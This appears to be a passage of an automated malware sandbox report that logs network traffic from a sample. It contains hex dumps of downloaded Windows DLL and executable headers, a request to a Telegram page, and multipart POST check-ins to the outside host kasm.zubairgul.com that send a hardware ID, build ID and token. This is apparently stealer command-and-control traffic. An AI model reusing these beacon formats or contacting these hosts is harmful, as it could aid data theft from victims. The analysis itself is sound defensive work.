00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 08 Oct 2024 02:24:45 GMTContent-Type: application/octet-streamContent-Length: 450024Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-6dde8"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 08 Oct 2024 02:24:46 GMTContent-Type: application/octet-streamContent-Length: 257872Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-3ef50"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 08 Oct 2024 02:24:46 GMTContent-Type: application/octet-streamContent-Length: 80880Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-13bf0"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 08 Oct 2024 02:24:46 GMTContent-Type: application/octet-streamContent-Length: 2046288Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-1f3950"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 08 Oct 2024 02:24:54 GMTContent-Type: application/octet-streamContent-Length: 551424Last-Modified: Tue, 08 Oct 2024 02:18:36 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "6704967c-86a00"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3d 89 39 06 79 e8 57 55 79 e8 57 55 79 e8 57 55 aa 9a 54 54 75 e8 57 55 aa 9a 52 54 d2 e8 57 55 aa 9a 53 54 6c e8 57 55 aa 9a 56 54 7a e8 57 55 79 e8 56 55 21 e8 57 55 69 6c 54 54 6d e8 57 55 69 6c 53 54 6b e8 57 55 69 6c 52 54 34 e8 57 55 31 6d 5e 54 78 e8 57 55 31 6d a8 55 78 e8 57 55 31 6d 55 54 78 e8 57 55 52 69 63 68 79 e8 57 55 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7b 96 04 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 29 00 12 02 00 00 62 06 00 00 00 00 00 52 6f 00 00 00 10 00 00 00 30 02 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 08 00 00 04 00 00 e3 b7 08 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c0 c6 02 00 28 00 00 00 00 80 08 00 d8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 08 00 d4 1a 00 00 c0 ab 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ab 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 02 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f0 10 02 00 00 10 00 00 00 12 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 78 9d 00 00 00 30 02 00 00 9e 00 00 00 16 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 78 a3 05 00 00 d0 02 00 00 96 05 00 00 b4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d8 03 00 00 00 80 08 00 00 04 00 00 00 4a 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d4 1a 00 00 00 90 08 00 00 1c 00 00 00 4e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /maslengdsa HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AFIDGDBGCAAFIDHIJKEHHost: kasm.zubairgul.comContent-Length: 256Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 49 4a 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 44 46 39 31 35 44 38 30 32 46 37 33 38 39 37 32 35 30 38 33 31 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 49 4a 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 61 35 62 63 38 62 37 33 65 31 32 34 32 35 61 64 63 33 63 33 39 39 64 61 38 31 33 36 38 39 31 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 49 4a 4b 45 48 2d 2d 0d 0a Data Ascii: ------AFIDGDBGCAAFIDHIJKEHContent-Disposition: form-data; name="hwid"CDF915D802F73897250831-a33c7340-61ca------AFIDGDBGCAAFIDHIJKEHContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------AFIDGDBGCAAFIDHIJKEH--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JKECFCFBGDHIECAAFIIDHost: kasm.zubairgul.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 33 37 36 33 36 33 61 62 37 33 32 64 66 34 34 31 31 36 61 31 65 34 31 30 37 37 64 62 36 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 61 35 62 63 38 62 37 33 65 31 32 34 32 35 61 64 63 33 63 33 39 39 64 61 38 31 33 36 38 39 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 2d 2d 0d 0a Data Ascii: ------JKECFCFBGDHIECAAFIIDContent-Disposition: form-data; name="token"ed376363ab732df44116a1e41077db66------JKECFCFBGDHIECAAFIIDContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------JKECFCFBGDHIECAAFIIDContent-Disposition: form-data; name="mode"1------JKECFCFBGDHIECAAFIID--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKECBFBAEBKJJJJKFCGCHost: kasm.zubairgul.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 33 37 36 33 36 33 61 62 37 33 32 64 66 34 34 31 31 36 61 31 65 34 31 30 37 37 64 62 36 36 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 61 35 62 63 38 62 37 33 65 31 32 34 32 35 61 64 63 33 63 33 39 39 64 61 38 31 33 36 38 39 31 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 2d 2d 0d 0a Data Ascii: ------AKECBFBAEBKJJJJKFCGCContent-Disposition: form-data; name="token"ed376363ab732df44116a1e41077db66------AKECBFBAEBKJJJJKFCGCContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------AKECBFBAEBKJJJJKFCGCContent-Disposition: form-data; name="mode"2------AKECBFBAEBKJJJJKFCGC--
